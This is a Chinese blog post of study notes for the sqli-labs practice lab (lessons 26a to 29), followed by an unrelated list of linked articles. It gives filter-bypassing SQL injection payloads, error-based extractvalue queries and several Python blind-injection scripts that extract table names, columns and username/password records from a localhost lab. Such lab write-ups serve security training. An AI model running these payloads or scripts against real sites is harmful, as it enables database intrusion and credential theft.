sqli-labs学习笔记 DAY5
DAY 5
sqli-labs lesson 26a
- 闭合符号为单引号和括号,并且不回显错误,如果服务器是Linux,尝试%a0代替空格,这里尝试使用布尔型
- 数据库名长度:?id=1’)&&if(length(database())=8,1,0)||('0
- 爆库:?id=1’)&&if(left(database(),8)=‘security’,1,0)||('0
- 爆表:
- 当返回为真,长度为914,返回为假,长度为863
- 编写Python脚本辅助解题:
#coding:utf-8 import urllib print "26a" url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270" html = urllib.urlopen(url).read() pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26" end_url = "||(%270" # condition = "" # payload = "if((" + condition + "),1,0)" from_ = "infoorrmation_schema.tables" where = "table_schema='security'" select = "select(group_concat(table_name))from(" + from_ + ")where(" + where + ")" result = [] for pos in range(1,100): # 判断出界 condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str(127) payload = "if((" + condition + "),1,0)" url = pre_url + payload + end_url if "Your Login name" in urllib.urlopen(url).read(): print "".join(result) exit() # 没有出界 asc1 = 32 asc2 = 127 while not asc1 >= asc2: # 判断出界 condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2) payload = "if((" + condition + "),1,0)" url = pre_url + payload + end_url # print url if "Your Login name" in urllib.urlopen(url).read(): asc1 = (asc1+asc2)//2 + 1 else: asc2 = (asc1+asc2)//2 result.append(chr(asc1)) print "".join(result)
- 爆字段:
#coding:utf-8
import urllib
print "26a"
url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
html = urllib.urlopen(url).read()
pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
end_url = "||(%270"
# condition = ""
# payload = "if((" + condition + "),1,0)"
from_ = "infoorrmation_schema.columns"
where = "table_schema='security'%26%26table_name='users'"
select = "select(group_concat(column_name))from(" + from_ + ")where(" + where + ")"
result = []
for pos in range(1,100):
# 判断出界
condition = "length((" + select + "))<" + str(pos)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
if "Your Login name" in urllib.urlopen(url).read():
print "".join(result)
print "CRACKED"
exit()
# 没有出界
asc1 = 32
asc2 = 127
while not asc1 >= asc2:
# 判断出界
condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
# print url
if "Your Login name" in urllib.urlopen(url).read():
asc1 = (asc1+asc2)//2 + 1
else:
asc2 = (asc1+asc2)//2
result.append(chr(asc1))
print "".join(result)
- 爆记录:
#coding:utf-8
import urllib
print "26a"
url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26if(1,1,0)||(%270"
html = urllib.urlopen(url).read()
pre_url = "http://localhost/sqli-labs-master/Less-26a/?id=1%27)%26%26"
end_url = "||(%270"
# condition = ""
# payload = "if((" + condition + "),1,0)"
from_ = "users"
where = "1=1"
select = "select(group_concat(concat(username,passwoorrd)))from(" + from_ + ")where(" + where + ")"
result = []
for pos in range(1,100):
# 判断出界
condition = "length((" + select + "))<" + str(pos)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
if "Your Login name" in urllib.urlopen(url).read():
print "".join(result)
print "CRACKED"
exit()
# 没有出界
asc1 = 32
asc2 = 127
while not asc1 >= asc2:
# 判断出界
condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
# print url
if "Your Login name" in urllib.urlopen(url).read():
asc1 = (asc1+asc2)//2 + 1
else:
asc2 = (asc1+asc2)//2
result.append(chr(asc1))
print "".join(result)
注:最大破解长度可以更改
sqli-labs lesson 27
- 过滤了select、SELECT和Select等,直接报错注入
- 爆库:?id=1%27%26%26extractvalue(1,concat(0x7e,(database()),0x7e))||%27
- 爆表:?id=1’%26%26extractvalue(1,concat(0x7e,(seLect(group_concat(table_name))from(information_schema.tables)where(table_schema=‘security’)),0x7e))||’
- 爆字段:?id=1’%26%26extractvalue(1,concat(0x7e,(seLect(group_concat(column_name))from(information_schema.columns)where(table_schema=‘security’%26%26table_name=‘users’)),0x7e))||’
- 爆记录:http://localhost/sqli-labs-master/Less-27/?id=1'%26%26extractvalue(1,concat(0x7e,mid((seLect(group_concat(concat_ws(',',username,password)))from(security.users)),position,length),0x7e))||%27
sqli-labs 27a
- 依然是盲注
- 注入点与闭合符号的检测:?id=1"%26%260||"0
- 爆库:
#coding:utf-8
import urllib
print "27a"
# url = "http://localhost/sqli-labs-master/Less-27/?id=1%22a)%26%26if(1,1,0)||(%220"
# html = urllib.urlopen(url).read()
pre_url = "http://localhost/sqli-labs-master/Less-27a/?id=1%22%26%26"
end_url = "||%220"
# condition = ""
# payload = "if((" + condition + "),1,0)"
from_ = "users"
where = "1=1"
# select = "seLect(group_concat(concat(username,password)))from(" + from_ + ")where(" + where + ")"
select = "database()"
result = []
for pos in range(1,100):
# 判断出界
condition = "length((" + select + "))<" + str(pos)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
if "Your Login name" in urllib.urlopen(url).read():
print "".join(result)
print "CRACKED"
exit()
# 没有出界
asc1 = 32
asc2 = 127
while not asc1 >= asc2:
# 判断出界
condition = "ascii(mid((" + select + ")," + str(pos) + ",1))>" + str((asc1+asc2)//2)
payload = "if((" + condition + "),1,0)"
url = pre_url + payload + end_url
# print url
if "Your Login name" in urllib.urlopen(url).read():
asc1 = (asc1+asc2)//2 + 1
else:
asc2 = (asc1+asc2)//2
result.append(chr(asc1))
print "".join(result)
- 爆表,爆字段,爆记录:代码同lesson 26a,更改url即可
sqli-labs lesson 28
- 闭合符号为’),盲注与上一题同解
- 报错注入同lesson 27
sqli-labs lesson 28a
- 与lesson 28的盲注同解
sqli-labs lesson 29
- 什么是WAF:https://www.techbang.com/posts/1826-waf-web-host-bridge-is-falling-down
- 这题需要配置Tomcat服务器
- HPP:https://blog.csdn.net/whatday/article/details/54745713?utm_source=blogxgwz1
- 根据HPP,tomcat会过滤第一个参数,而Apache会处理第二个参数,所以参考lesson 1即可
sqli-labs学习笔记 DAY5的更多相关文章
- Sqli - Labs 靶场笔记(一)
Less - 1: 页面: URL: http://127.0.0.1/sqli-labs-master/Less-1/ 测试: 1.回显正常,说明不是数字型注入, http://127.0.0.1/ ...
- Python学习笔记——Day5(转载)
python 编码转换 主要介绍了python的编码机制,unicode, utf-8, utf-16, GBK, GB2312,ISO-8859-1 等编码之间的转换. 常见的编码转换分为以下几种情 ...
- Python学习笔记-Day5
冒泡算法: 实现1: a = [,,,,,,,,,,,,,,] def bubble(badlist): sort = False while not sort: sort = True ): ]: ...
- Python学习笔记day5
模块 1.自定义模块 自定义模块就是在当前目录下创建__init__.py这个空文件,这样外面的程序才能识别此目录为模块包并导入 上图中libs目录下有__init__.py文件,index.py程序 ...
- 学习笔记day5:inline inline-block block区别
1. block元素可以包含block元素和inline元素:但inline元素只能包含inline元素.要注意的是这个是个大概的说法,每个特定的元素能包含的元素也是特定的,所以具体到个别元素上,这条 ...
- JS学习笔记Day5
一.变量的作用域 1.作用域:变量的作用范围 2.全局变量:变量在整个程序都是有效的(从程序开始到程序结束变量均有效)在函数体外部定义的变量都是全局变量:在函数体内部 没有用var定义的变量也有可能是 ...
- HTML学习笔记Day5
一.CSS属性 1.文本溢出是否“...”显示属性:text-overflow:clip(不显示省略标记)/ellipsis(文本溢出时“...”显示) 定义此属性有四个必要条件:1)须有容器宽度:w ...
- Python学习笔记 - day5 - 文件操作
Python文件操作 读写文件是最常见的IO操作,在磁盘上读写文件的功能都是由操作系统提供的,操作系统不允许普通的程序直接操作磁盘(大部分程序都需要间接的通过操作系统来完成对硬件的操作),所以,读写文 ...
- 商业爬虫学习笔记day5
一. 发送post请求 import requests url = "" # 发送post请求 data = { } response = requests.post(url, d ...
随机推荐
- 1491. [NOI2007]社交网络【最短路计数】
Description 在社交网络(socialnetwork)的研究中,我们常常使用图论概念去解释一些社会现象.不妨看这样的一个问题. 在一个社交圈子里有n个人,人与人之间有不同程度的关系.我们将这 ...
- Day2 CSS
什么是CSS 层叠样式表(cascading style sheet) 控制页面元素的显示方式.(添加样式) CSS语法 行间样式 行内式是在标记的style属性中设定CSS样式.这种方式没有体现出C ...
- java 装饰者模式
一.概念 我们在使用以前既定的类或者使用别人使用的类的时候,如果该类的方法,不满足你的需求的时候,需要你进行额外附加功能的时候,往往我们想到的方法是继承实现, 但是继承会导致类的越来越庞大,有什么好的 ...
- Spring源码分析(六)解析和注册BeanDefinitions
摘要:本文结合<Spring源码深度解析>来分析Spring 5.0.6版本的源代码.若有描述错误之处,欢迎指正. 当把文件转换为Document后,接下来的提取及注册bean就是我们的重 ...
- $Mayan$游戏
\(Mayan\)游戏 好啊,一年(半年)来的梦魇,终于结束了. 其实我从来没料到整体竟然会如此暴力--做的时候机房里冷得很,感觉晕晕乎乎地做完了,晕晕乎乎地调了好久,晕晕乎乎地听(看了题解的)\(q ...
- AWR报告中Top 10 Foreground Events存在”reliable message”等待事件的处理办法
操作系统版本:HP-UNIX B.11.31 数据库版本:11.2.0.4 RAC (一) 问题概要 (1)在AWR报告的Top 10 Foreground Events中发现reliable mes ...
- rpm-yum_install_software
rpm -ivh software_name安装软件 打印详情rpm -q software_name查询软件是否安装rpm -ql software_name查询安装目录rpm -e softwar ...
- jquery animate() Alternate 语法
前段时间在使用jQuery的animate() 函数时候用到Alternate方式.主要是要让数字自增到指定大小,且能看见数字增加过程. 一般使用如下方式: function autoPlusAnim ...
- R语言学习笔记(十八):零碎知识点46-50
seq_along与seq_len函数的使用 在for循环中有用 > seq_along(c(2,3,5)) [1] 1 2 3 > seq_len(3) [1] 1 2 3
- net辅助工具列表
最近对.net的辅助工具比较感兴趣,网上也已经有.net的十个必备工具的帖子了,这里提供了一份全面的工具列表: Code generation NVelocity CodeSmith X-Code . ...